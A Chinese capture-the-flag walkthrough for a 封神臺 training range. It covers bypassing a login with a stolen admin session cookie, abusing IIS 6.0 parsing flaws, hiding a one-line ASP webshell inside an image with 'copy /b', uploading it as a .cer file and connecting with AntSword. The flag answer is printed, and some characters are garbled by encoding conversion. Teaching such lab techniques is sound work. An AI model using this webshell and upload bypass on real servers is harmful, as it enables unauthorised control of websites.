封神臺 https://hack.zkaq.cn
一、1.通過修改Cookie登錄后臺(沒用重打)
????????2,上傳SHELL!3,F(xiàn)lag在網(wǎng)站根目錄(flag.php)
????????3.上傳圖片時建議上傳小文件,建議用QQ表情
????????尤里通過XSS終于得到了管理員Cookie,在修改了cookie后尤里直接繞過了登錄密碼,
????????看到了后臺功能!然后要做的,就是找一個上傳點,上傳自己的外殼了!
一.開始?
?這是用上一章XSS的cookie???? 用bp抓包也可以
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
?復(fù)制粘貼即可
?點擊準(zhǔn)備好了嗎或者f5刷新進(jìn)入網(wǎng)頁
二、分析Microsoft-IIS/6.0
可能存在IIS解析漏洞:
??? 1.目錄解析 以*.asp命名的文件夾里的文件都將會被當(dāng)成ASP文件執(zhí)行。
??? 2.文件解析 對于 *.asp;.jpg 像這種畸形文件名在";"后面的直接被忽略,也就是說當(dāng)成 *.asp文件執(zhí)行。
??? 3.IIS6.0 默認(rèn)的可執(zhí)行文件除了asp還包含這三種 *.asa *.cer *.cdx。
1.查看上傳目錄 和上傳文件限制
?系統(tǒng)管理 網(wǎng)站配置
?
2.確定上傳點
添加下載程序和添加產(chǎn)品都可
?三、生成木馬、上傳木馬
注意
流程:? 圖片 ----生成、植入木馬---木馬圖片---以.cer上傳----蟻劍----找到目錄flag
?
1.找一張空間較小的圖片
2. 以萬能的txt記事本打開
發(fā)現(xiàn)是亂碼 正常
3.寫個txt 改后綴名為php(網(wǎng)頁)
????????mm.txt里面寫一句話木馬?
????????簡單的? eval: 執(zhí)行??? request:從用戶那里取得的信息?? 木馬:執(zhí)行從用戶那里取得的信息
<%eval request ("a")%>
4. 復(fù)制生成帶有木馬的圖片
copy 1.jpg/b+mm.php 2.jpg
#復(fù)制 原圖片/b+木馬.php #新圖片
?
4.用記事本查看木馬圖片
末尾發(fā)現(xiàn)一句話木馬代表成功生成
5.改文件后綴名2.jpg改為2.cer 上傳
?
?復(fù)制到url
6. 在蟻劍添加這個網(wǎng)址
?直接打開FLAG!.txt
文章來源:http://www.zghlxwxcb.cn/news/detail-470089.html
?拿到flag? zkz{G3t_the_admin!Sh3ll}文章來源地址http://www.zghlxwxcb.cn/news/detail-470089.html
到了這里,關(guān)于封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!